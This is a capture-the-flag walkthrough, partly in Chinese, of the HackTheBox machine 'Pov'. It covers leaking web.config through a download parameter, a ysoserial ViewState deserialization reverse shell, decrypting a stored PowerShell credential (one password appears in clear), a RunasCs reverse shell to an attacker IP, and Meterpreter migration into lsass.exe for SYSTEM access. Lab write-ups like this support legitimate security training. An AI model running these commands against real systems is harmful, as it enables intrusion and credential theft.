Pov

Windows HTB
79

Machine:Window

Level:Hard

Fscan

└─$ fscan -h 10.10.11.251 -p 1-65537
   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.3
start infoscan
10.10.11.251:80 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle http://10.10.11.251       code:200 len:12330  title:pov.htb

Gobuter

└─# gobuster vhost -u http://pov.htb --append-domain -w ~/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 
===============================================================
Found: dev.pov.htb Status: 302 [Size: 152] [--> http://dev.pov.htb/portfolio/]

User Access

Info leakage

​ 网页中的有文件下载,对请求抓包发现有可控参数file同时我们也知道该框架是.Net FrameWork,我们将文件替换为web.confg查看是否有泄露1

__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=4MVXWxaQBPHaTsgXayrmLKrARtrbEMOf2I90nDyu%2FwhftqZmSgkvcL78EzS4%2FvRWcGynVu08CM1WXU9YhLUgiNY9Fao%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=IWT15trZdcxnL9stcoKpa8mYqTEQ%2FnmUNeS%2Bts2oG4rQoztLuNQVRf8RjsEOyEkTaJ9%2FhSPbCAKI2l%2FH4VHOrmiz%2BNh3z%2BsWJE16y%2BjVKApkHM0iLJRt5o33Fk6vIiESs6HyVg%3D%3D&file=cv.pdf

Pov_web

.NET Deserialization

​ 抓包重发读取到web.config中的machineKey,利用ViewState进行.Net反序列化2

<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="[blank]" validation="SHA1" validationKey="[blank]" />
  </system.web>
    <system.webServer>
        <httpErrors>
            <remove statusCode="403" subStatusCode="-1" />
            <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
        </httpErrors>
        <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
    </system.webServer>
</configuration>

​ 具体payload可以参考下面。

.\ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="[blank]" --validationalg="SHA1" --validationkey="[blank]" --path="/portfolio/default.aspx" -c "revshells@PowerShell#3(Base64)"

​ 将得到的参数放入__VIEWSTATE发送请求并监听即可。

└─$ nc -lvnp 1234
PS C:\users> whoami
pov\sfitz

Horizontal Privilege Escalation

​ 在winpeas中得到C:\Users\sfitz\Documents\connection.xml中存在alaading的密码,将得到

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">[blank]</SS>
    </Props>
  </Obj>
</Objs>

​ 利用如下命令进行解密并访问alaading账户。

PS C:\users\sfitz\Documents> $credential = Import-CliXml -Path  C:\users\sfitz\Documents\connection.xml
PS C:\users\sfitz\Documents> $credential.GetNetworkCredential().Password
[blank]
PS C:\users\sfitz\Documents> .\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.16.7:3456

Root Access

└─$ nc -lvnp 3456
listening on [any] 3456 ...
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
pov\alaading

MSF Process Injection

​ 上msf查看进程号,将当前🐎的进程迁移至system权限的进程上即可。

meterpreter > ps
Process List
============
 PID   PPID  Name               Arch  Session  User          Path
 ---   ----  ----               ----  -------  ----          ----
......
 636   480   lsass.exe          x64   0                      C:\Windows\System32\lsass.exe
......

meterpreter > migrate 636
[*] Migrating from 2116 to 636...
[*] Migration completed successfully.
meterpreter > shell

C:\Windows\system32>whoami
nt authority\system

Footnotes

  1. web.config 中关于 ViewState 的配置

  2. Viewstate利用之.Net >= 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true/false except both attribute to false